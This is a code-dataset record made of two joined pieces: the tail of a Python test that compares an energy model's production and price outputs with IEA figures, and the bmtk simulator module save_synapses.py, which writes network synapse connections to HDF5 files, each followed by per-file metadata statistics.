# biomass_dry_otherrtransf_witness
#
# error_biomassdry_otherrtransf_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_witness) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation production error : ', error_biomassdry_otherrtransf_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS :{biomass_dry_otherrtransf_witness} TWh')
#
# error_biomassdry_otherrtransf_with_ana_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_with_ana) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation (adding anaerobic digestion) production error : ', error_biomassdry_otherrtransf_with_ana_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS with anaerobic
# digestion :{biomass_dry_otherrtransf_with_ana} TWh')
print('---------- liquid biofuels balances -------------')
print('IEA biofuels includes bioethanol (ethanol produced from biomass), biomethanol (methanol produced from biomass), bioETBE (ethyl-tertio-butyl-ether produced on the basis of bioethanol) and bioMTBE (methyl-tertio-butyl-ether produced on the basis of biomethanol')
print('and biodiesel (a methyl-ester produced from vegetable or animal oil, of diesel quality), biodimethylether (dimethylether produced from biomass), Fischer Tropsch (Fischer Tropsch produced from biomass), cold pressed bio-oil (oil produced from oil seed through mechanical processing only) ')
raw_biodiesel_prod = energy_production[
'production fuel.biodiesel (TWh)'][0]
raw_hydrotreated_oil_fuel_prod = energy_production[
'production fuel.hydrotreated_oil_fuel (TWh)'][0]
raw_liquid_fuel = raw_biodiesel_prod + \
raw_hydrotreated_oil_fuel_prod
liquidbiofuels_raw_prod_iea = 131224 * 1e6 * 11.9 / 1e9 # in kt
error_liquid_fuel_raw_prod = np.abs(
liquidbiofuels_raw_prod_iea - raw_liquid_fuel) / liquidbiofuels_raw_prod_iea * 100.0
print('Liquid fuels raw production error : ', error_liquid_fuel_raw_prod, ' %',
f'IEA :{liquidbiofuels_raw_prod_iea} TWh vs WITNESS :{raw_liquid_fuel} TWh')
print(
'A lot of biofuels are not implemented (no details of specific biofuels productions ')
print('---------- Biogases balances -------------')
print('In IEA, biogas are mainly gases from the anaerobic digestion but also can be produced from thermal processes (pyrolysis) or from syngas')
print('WITNESS model considers only anaerobic digestion')
raw_biogas_prod = energy_production[
'production biogas (TWh)'][0]
biogas_raw_prod_iea = 1434008 / 3600
error_biogas_raw_prod = np.abs(
biogas_raw_prod_iea - raw_biogas_prod) / biogas_raw_prod_iea * 100.0
print('Biogas raw production error : ', error_biogas_raw_prod, ' %',
f'IEA :{biogas_raw_prod_iea} TWh vs WITNESS :{raw_biogas_prod} TWh')
print(
f'Biogas is used in energy industry mainly for electricity plants {448717/3600} TWh and CHP plants {385127/3600} TWh')
print('These technologies are not yet implemented in WITNESS models, then :')
biogas_net_prod_iea = 521188 / 3600
net_biogas_prod = net_energy_production[
'production biogas (TWh)'][0]
error_biogas_net_prod = np.abs(
biogas_net_prod_iea - net_biogas_prod) / biogas_net_prod_iea * 100.0
print('Biogas net production error : ', error_biogas_net_prod, ' %',
f'IEA :{biogas_net_prod_iea} TWh vs WITNESS :{net_biogas_prod} TWh')
'''
Oil balances
'''
print('---------- Oil balances -------------')
iea_data_oil = {'kerosene': (14082582 + 2176724) / 3600,
# gasoline + diesel
'gasoline': (41878252 + 56524612) / 3600,
#'diesel': 56524612 / 3600,
#'naphtas' :11916946/3600,
'heating_oil': 16475667 / 3600, # equivalent to fuel oil
#'other_oil_products' :25409482/3600,
'liquefied_petroleum_gas': 5672984 / 3600, # LPG/ethane
'fuel.liquid_fuel': 190442343 / 3600 # total of crude oil
}
raw_refinery_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.fuel.liquid_fuel.Refinery.techno_production')
raw_refinery_prod_2020 = raw_refinery_prod.loc[
raw_refinery_prod['years'] == 2020] * 1000.0
for oil_name, oil_prod in iea_data_oil.items():
oil_prod_witness = raw_refinery_prod_2020[
f'{oil_name} (TWh)'].values[0]
error_oil_prod = np.abs(
oil_prod - oil_prod_witness) / oil_prod * 100.0
print(f'{oil_name} raw production error : ', error_oil_prod, ' %',
f'IEA :{oil_prod} TWh vs WITNESS :{oil_prod_witness} TWh')
print(
'WITNESS model only takes for now raw liquid_fuel production which is correct')
net_liquid_fuel_prod = net_energy_production[
'production fuel.liquid_fuel (TWh)'][0]
liquid_fuel_net_prod_iea = 168375005 / 3600
error_liquid_fuel_net_prod = np.abs(
liquid_fuel_net_prod_iea - net_liquid_fuel_prod) / liquid_fuel_net_prod_iea * 100.0
print('Liquid fuel net production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{liquid_fuel_net_prod_iea} TWh vs WITNESS :{net_liquid_fuel_prod} TWh')
liquid_fuel_own_use = 2485.89 # TWH
liquid_fuel_raw_prod = raw_refinery_prod_2020[
f'fuel.liquid_fuel (TWh)'].values[0]
energy_production_raw_liquidfuel_iea = 52900 - liquid_fuel_own_use
print(
f'Energy own use for liquid fuel production is {liquid_fuel_own_use} TWh')
print('Liquid fuel raw production error : ', error_liquid_fuel_net_prod, ' %',
f'IEA :{energy_production_raw_liquidfuel_iea} TWh vs WITNESS :{liquid_fuel_raw_prod} TWh')
chp_plants = 159.62 + 99.81 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / liquid_fuel_raw_prod * 100.0, ' % of total raw liquid fuel production : ', chp_plants, ' TWh')
oil_elec_plants = 1591.67 # TWh
# elec plants needs
elec_plants_oil = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'fuel.liquid_fuel (TWh)'][0] * 1000.0
error_oil_cons = np.abs(
oil_elec_plants - elec_plants_oil) / oil_elec_plants * 100.0
print('Liquid fuel consumption from elec error : ', error_oil_cons, ' %',
f'IEA :{oil_elec_plants} TWh vs WITNESS :{elec_plants_oil} TWh')
print('----------------- Total production -------------------')
total_raw_prod_iea = 173340 # TWh
total_raw_prod = energy_production['Total production'][0]
error_total_raw_prod = np.abs(
total_raw_prod_iea - total_raw_prod) / total_raw_prod_iea * 100.0
print('Total raw production error : ', error_total_raw_prod, ' %',
f'IEA :{total_raw_prod_iea} TWh vs WITNESS :{total_raw_prod} TWh')
total_net_prod_iea = 116103 # TWh
total_net_prod = net_energy_production['Total production'][0]
error_total_net_prod = np.abs(
total_net_prod_iea - total_net_prod) / total_net_prod_iea * 100.0
print('Total net production error : ', error_total_net_prod, ' %',
f'IEA :{total_net_prod_iea} TWh vs WITNESS :{total_net_prod} TWh')
def test_04_check_prices_values(self):
'''
Test order of magnitude of prices
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
# These emissions are in Gt
energy_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices')
energy_prices_after_tax = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_prices_after_tax')
'''
Energy prices
'''
print('Comparison of prices coming from globalpetrolprices.com')
elec_price_iea = 137 # $/MWh
elec_price = energy_prices[
'electricity'][0]
error_elec_price = np.abs(
elec_price_iea - elec_price) / elec_price_iea * 100.0
print('Electricity price error in 2021: ', error_elec_price, ' %',
f'globalpetrolprices.com :{elec_price_iea} $/MWh vs WITNESS :{elec_price} $/MWh')
ng_price_iea_2022 = 1.17 / 0.657e-3 / 13.9 # $/MWh
ng_price_iea_2021 = 0.8 / 0.657e-3 / 13.9 # $/MWh
ng_price = energy_prices[
'methane'][0]
error_ng_price = np.abs(
ng_price_iea_2021 - ng_price) / ng_price_iea_2021 * 100.0
print('Natural Gas/Methane price error in 2021 : ', error_ng_price, ' %',
f'globalpetrolprices.com :{ng_price_iea_2021} $/MWh vs WITNESS :{ng_price} $/MWh')
kerosene_price_iea = 0.92 / 0.0095 # $/MWh in 2022
kerosene_price_iea_2021 = 2.8 / 39.5 * 1000 # $/MWh in 2021
kerosene_price = energy_prices[
'fuel.liquid_fuel'][0]
error_kerosene_price = np.abs(
kerosene_price_iea_2021 - kerosene_price) / kerosene_price_iea_2021 * 100.0
print('kerosene price error in 2021 : ', error_kerosene_price, ' %',
f'globalpetrolprices.com :{kerosene_price_iea_2021} $/MWh vs WITNESS :{kerosene_price} $/MWh')
print('hydrogen prices details have been found on IEA website :https://www.iea.org/data-and-statistics/charts/global-average-levelised-cost-of-hydrogen-production-by-energy-source-and-technology-2019-and-2050 ')
hydrogen_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.energy_detailed_techno_prices')
smr_price_iea = 1.6 / 33.3 * 1000 # between 0.7 and 1.6 $/kg mean : 1.15 $/kg
# between 1.9 and 2.5 $/kg mean : 2.2 $/kg
coal_gas_price_iea = 2.5 / 33.3 * 1000
wgs_price = hydrogen_prices[
'WaterGasShift'][0]
wgs_price_iea = 0.75 * smr_price_iea + 0.25 * coal_gas_price_iea
error_wgs_price = np.abs(
wgs_price_iea - wgs_price) / wgs_price_iea * 100.0
print('Hydrogen price by watergas shift (coal and gas) error in 2021: ', error_wgs_price, ' %',
f'IEA :{wgs_price_iea} $/MWh vs WITNESS :{wgs_price} $/MWh')
electrolysis_price_iea = 7.7 / 33.3 * 1000 # between 3.2 and 7.7 $/kg
electrolysis_price = hydrogen_prices[
'Electrolysis.SOEC'][0]
error_electrolysis_price = np.abs(
electrolysis_price_iea - electrolysis_price) / electrolysis_price_iea * 100.0
print('Hydrogen price by Electrolysis error in 2021: ', error_electrolysis_price, ' %',
f'IEA :{electrolysis_price_iea} $/MWh vs WITNESS :{electrolysis_price} $/MWh')
biogas_price_gazpack = 30 / 0.293 # 30 $/mbtu
biogas_price = energy_prices[
'biogas'][0]
error_biogas_price = np.abs(
biogas_price_gazpack - biogas_price) / biogas_price_gazpack * 100.0
print('Biogas price error in 2019: ', error_biogas_price, ' %',
f'gazpack.nl/ :{biogas_price_gazpack} $/MWh vs WITNESS :{biogas_price} $/MWh')
# between 50 and 100 $ /tonne
coal_price_ourworldindata = 50 * 1e-3 / 4.86 * 1e3
coal_price = energy_prices[
'solid_fuel'][0]
error_coal_price = np.abs(
coal_price_ourworldindata - coal_price) / coal_price_ourworldindata * 100.0
print('Coal price error in 2021: ', error_coal_price, ' %',
f'ourworldindata.com :{coal_price_ourworldindata} $/MWh vs WITNESS :{coal_price} $/MWh')
biodiesel_price_neste = 1500 / 10.42
biodiesel_price = energy_prices[
'fuel.biodiesel'][0]
error_biodiesel_price = np.abs(
biodiesel_price_neste - biodiesel_price) / biodiesel_price_neste * 100.0
print('Biodiesel price error in 2021: ', error_biodiesel_price, ' %',
f'neste.com :{biodiesel_price_neste} $/MWh vs WITNESS :{biodiesel_price} $/MWh')
biomass_price_statista = 35 / 3.6
biomass_price = energy_prices[
'biomass_dry'][0]
error_biomass_price = np.abs(
biomass_price_statista - biomass_price) / biomass_price_statista * 100.0
print('Biomass price error in 2021: ', error_biomass_price, ' %',
f'US statista.com :{biomass_price_statista} $/MWh vs WITNESS :{biomass_price} $/MWh')
hefa_price_iea = 1.2 / 780e-3 / 12.2 * 1000
hefa_price = energy_prices[
'fuel.hydrotreated_oil_fuel'][0]
error_hefa_price = np.abs(
hefa_price_iea - hefa_price) / hefa_price_iea * 100.0
print('HEFA price error in 2020: ', error_hefa_price, ' %',
f'IEA :{hefa_price_iea} $/MWh vs WITNESS :{hefa_price} $/MWh')
print('------------- Electricity prices --------------')
elec_detailed_prices = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.energy_detailed_techno_prices')
elec_detailed_prices['Nuclear'].values[0]
if '__main__' == __name__:
t0 = time.time()
cls = TestGlobalEnergyValues()
cls.setUp()
cls.test_03_check_net_production_values()
print(f'Time : {time.time() - t0} s')
| 47.680769
| 304
| 0.638239
| 6,106
| 49,588
| 4.892401
| 0.092532
| 0.045526
| 0.012051
| 0.01657
| 0.593479
| 0.486392
| 0.408965
| 0.356174
| 0.329361
| 0.309812
| 0
| 0.045714
| 0.260204
| 49,588
| 1,039
| 305
| 47.72666
| 0.768598
| 0.307635
| 0
| 0.123457
| 0
| 0.016461
| 0.343213
| 0.119708
| 0
| 0
| 0
| 0
| 0.018519
| 1
| 0.00823
| false
| 0
| 0.012346
| 0
| 0.022634
| 0.154321
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
396aa7d766efce4140f100be9476c86629b27ef9
| 11,383
|
py
|
Python
|
bmtk/simulator/bionet/modules/save_synapses.py
|
tjbanks/bmtk
|
52fee3b230ceb14a666c46f57f2031c38f1ac5b1
|
[
"BSD-3-Clause"
] | 1
|
2019-03-27T12:23:09.000Z
|
2019-03-27T12:23:09.000Z
|
bmtk/simulator/bionet/modules/save_synapses.py
|
tjbanks/bmtk
|
52fee3b230ceb14a666c46f57f2031c38f1ac5b1
|
[
"BSD-3-Clause"
] | null | null | null |
bmtk/simulator/bionet/modules/save_synapses.py
|
tjbanks/bmtk
|
52fee3b230ceb14a666c46f57f2031c38f1ac5b1
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import csv
import h5py
import numpy as np
from neuron import h
from .sim_module import SimulatorMod
from bmtk.simulator.bionet.biocell import BioCell
from bmtk.simulator.bionet.io_tools import io
from bmtk.simulator.bionet.pointprocesscell import PointProcessCell
pc = h.ParallelContext()
MPI_RANK = int(pc.id())
N_HOSTS = int(pc.nhost())
class SaveSynapses(SimulatorMod):
def __init__(self, network_dir, single_file=False, **params):
self._network_dir = network_dir
self._virt_lookup = {}
self._gid_lookup = {}
self._sec_lookup = {}
if not os.path.exists(network_dir):
os.makedirs(network_dir)
if N_HOSTS > 1:
io.log_exception('save_synapses module is not current supported with mpi')
self._syn_writer = ConnectionWriter(network_dir)
def _print_nc(self, nc, src_nid, trg_nid, cell, src_pop, trg_pop, edge_type_id):
if isinstance(cell, BioCell):
sec_x = nc.postloc()
sec = h.cas()
sec_id = self._sec_lookup[cell.gid][sec] #cell.get_section_id(sec)
h.pop_section()
self._syn_writer.add_bio_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0], sec_id, sec_x)
# print '{} ({}) <-- {} ({}), {}, {}, {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay, sec_id, sec_x)
else:
self._syn_writer.add_point_conn(edge_type_id, src_nid, src_pop, trg_nid, trg_pop, nc.weight[0])
#print '{} ({}) <-- {} ({}), {}, {}'.format(trg_nid, trg_pop, src_nid, src_pop, nc.weight[0], nc.delay)
def initialize(self, sim):
io.log_info('Saving network connections. This may take a while.')
# Need a way to look up virtual nodes from nc.pre()
for pop_name, nodes_table in sim.net._virtual_nodes.items():
for node_id, virt_node in nodes_table.items():
self._virt_lookup[virt_node.hobj] = (pop_name, node_id)
# Need to figure out node_id and pop_name from nc.srcgid()
for node_pop in sim.net.node_populations:
pop_name = node_pop.name
for node in node_pop[0::1]:
if node.model_type != 'virtual':
self._gid_lookup[node.gid] = (pop_name, node.node_id)
for gid, cell in sim.net.get_local_cells().items():
trg_pop, trg_id = self._gid_lookup[gid]
if isinstance(cell, BioCell):
#from pprint import pprint
#pprint({i: s_name for i, s_name in enumerate(cell.get_sections())})
#exit()
# sections = cell._syn_seg_ix
self._sec_lookup[gid] = {sec_name: sec_id for sec_id, sec_name in enumerate(cell.get_sections_id())}
else:
sections = [-1]*len(cell.netcons)
for nc, edge_type_id in zip(cell.netcons, cell._edge_type_ids):
src_gid = int(nc.srcgid())
if src_gid == -1:
# source is a virtual node
src_pop, src_id = self._virt_lookup[nc.pre()]
else:
src_pop, src_id = self._gid_lookup[src_gid]
self._print_nc(nc, src_id, trg_id, cell, src_pop, trg_pop, edge_type_id)
self._syn_writer.close()
io.log_info(' Done saving network connections.')
class ConnectionWriter(object):
class H5Index(object):
def __init__(self, network_dir, src_pop, trg_pop):
# TODO: Merge with NetworkBuilder code for building SONATA files
self._nsyns = 0
self._n_biosyns = 0
self._n_pointsyns = 0
self._block_size = 5
self._pop_name = '{}_{}'.format(src_pop, trg_pop)
self._h5_file = h5py.File(os.path.join(network_dir, '{}_edges.h5'.format(self._pop_name)), 'w')
self._pop_root = self._h5_file.create_group('/edges/{}'.format(self._pop_name))
self._pop_root.create_dataset('edge_group_id', (self._block_size, ), dtype=np.uint16,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('source_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['source_node_id'].attrs['node_population'] = src_pop
self._pop_root.create_dataset('target_node_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root['target_node_id'].attrs['node_population'] = trg_pop
self._pop_root.create_dataset('edge_type_id', (self._block_size, ), dtype=np.uint32,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/syn_weight', (self._block_size, ), dtype=np.float,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_id', (self._block_size, ), dtype=np.uint64,
chunks=(self._block_size, ), maxshape=(None, ))
self._pop_root.create_dataset('0/sec_x', (self._block_size, ), chunks=(self._block_size, ),
maxshape=(None, ), dtype=np.float)
self._pop_root.create_dataset('1/syn_weight', (self._block_size, ), dtype=np.float,
chunks=(self._block_size, ), maxshape=(None, ))
def _add_conn(self, edge_type_id, src_id, trg_id, grp_id):
self._pop_root['edge_type_id'][self._nsyns] = edge_type_id
self._pop_root['source_node_id'][self._nsyns] = src_id
self._pop_root['target_node_id'][self._nsyns] = trg_id
self._pop_root['edge_group_id'][self._nsyns] = grp_id
self._nsyns += 1
if self._nsyns % self._block_size == 0:
self._pop_root['edge_type_id'].resize((self._nsyns + self._block_size,))
self._pop_root['source_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['target_node_id'].resize((self._nsyns + self._block_size, ))
self._pop_root['edge_group_id'].resize((self._nsyns + self._block_size, ))
def add_bio_conn(self, edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x):
self._add_conn(edge_type_id, src_id, trg_id, 0)
self._pop_root['0/syn_weight'][self._n_biosyns] = syn_weight
self._pop_root['0/sec_id'][self._n_biosyns] = sec_id
self._pop_root['0/sec_x'][self._n_biosyns] = sec_x
self._n_biosyns += 1
if self._n_biosyns % self._block_size == 0:
self._pop_root['0/syn_weight'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_id'].resize((self._n_biosyns + self._block_size, ))
self._pop_root['0/sec_x'].resize((self._n_biosyns + self._block_size, ))
def add_point_conn(self, edge_type_id, src_id, trg_id, syn_weight):
self._add_conn(edge_type_id, src_id, trg_id, 1)
self._pop_root['1/syn_weight'][self._n_pointsyns] = syn_weight
self._n_pointsyns += 1
if self._n_pointsyns % self._block_size == 0:
self._pop_root['1/syn_weight'].resize((self._n_pointsyns + self._block_size, ))
def clean_ends(self):
self._pop_root['source_node_id'].resize((self._nsyns,))
self._pop_root['target_node_id'].resize((self._nsyns,))
self._pop_root['edge_group_id'].resize((self._nsyns,))
self._pop_root['edge_type_id'].resize((self._nsyns,))
self._pop_root['0/syn_weight'].resize((self._n_biosyns,))
self._pop_root['0/sec_id'].resize((self._n_biosyns,))
self._pop_root['0/sec_x'].resize((self._n_biosyns,))
self._pop_root['1/syn_weight'].resize((self._n_pointsyns,))
eg_ds = self._pop_root.create_dataset('edge_group_index', (self._nsyns, ), dtype=np.uint64)
bio_count, point_count = 0, 0
for idx, grp_id in enumerate(self._pop_root['edge_group_id']):
if grp_id == 0:
eg_ds[idx] = bio_count
bio_count += 1
elif grp_id == 1:
eg_ds[idx] = point_count
point_count += 1
self._create_index('target')
def _create_index(self, index_type='target'):
if index_type == 'target':
edge_nodes = np.array(self._pop_root['target_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/target_to_source')
elif index_type == 'source':
edge_nodes = np.array(self._pop_root['source_node_id'], dtype=np.int64)
output_grp = self._pop_root.create_group('indicies/source_to_target')
edge_nodes = np.append(edge_nodes, [-1])
n_targets = np.max(edge_nodes)
ranges_list = [[] for _ in xrange(n_targets + 1)]
n_ranges = 0
begin_index = 0
cur_trg = edge_nodes[begin_index]
for end_index, trg_gid in enumerate(edge_nodes):
if cur_trg != trg_gid:
ranges_list[cur_trg].append((begin_index, end_index))
cur_trg = int(trg_gid)
begin_index = end_index
n_ranges += 1
node_id_to_range = np.zeros((n_targets + 1, 2))
range_to_edge_id = np.zeros((n_ranges, 2))
range_index = 0
for node_index, trg_ranges in enumerate(ranges_list):
if len(trg_ranges) > 0:
node_id_to_range[node_index, 0] = range_index
for r in trg_ranges:
range_to_edge_id[range_index, :] = r
range_index += 1
node_id_to_range[node_index, 1] = range_index
output_grp.create_dataset('range_to_edge_id', data=range_to_edge_id, dtype='uint64')
output_grp.create_dataset('node_id_to_range', data=node_id_to_range, dtype='uint64')
def __init__(self, network_dir):
self._network_dir = network_dir
self._pop_groups = {}
def _group_key(self, src_pop, trg_pop):
return (src_pop, trg_pop)
def _get_edge_group(self, src_pop, trg_pop):
grp_key = self._group_key(src_pop, trg_pop)
if grp_key not in self._pop_groups:
self._pop_groups[grp_key] = self.H5Index(self._network_dir, src_pop, trg_pop)
return self._pop_groups[grp_key]
def add_bio_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight, sec_id, sec_x):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_bio_conn(edge_type_id, src_id, trg_id, syn_weight, sec_id, sec_x)
def add_point_conn(self, edge_type_id, src_id, src_pop, trg_id, trg_pop, syn_weight):
h5_grp = self._get_edge_group(src_pop, trg_pop)
h5_grp.add_point_conn(edge_type_id, src_id, trg_id, syn_weight)
def close(self):
for _, h5index in self._pop_groups.items():
h5index.clean_ends()
| 48.233051
| 139
| 0.598876
| 1,575
| 11,383
| 3.902857
| 0.125714
| 0.0558
| 0.073369
| 0.021474
| 0.51033
| 0.458923
| 0.37075
| 0.32585
| 0.317391
| 0.312836
| 0
| 0.010891
| 0.282087
| 11,383
| 235
| 140
| 48.438298
| 0.741312
| 0.050338
| 0
| 0.088398
| 0
| 0
| 0.071673
| 0.00463
| 0
| 0
| 0
| 0.004255
| 0
| 1
| 0.082873
| false
| 0
| 0.049724
| 0.005525
| 0.160221
| 0.01105
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|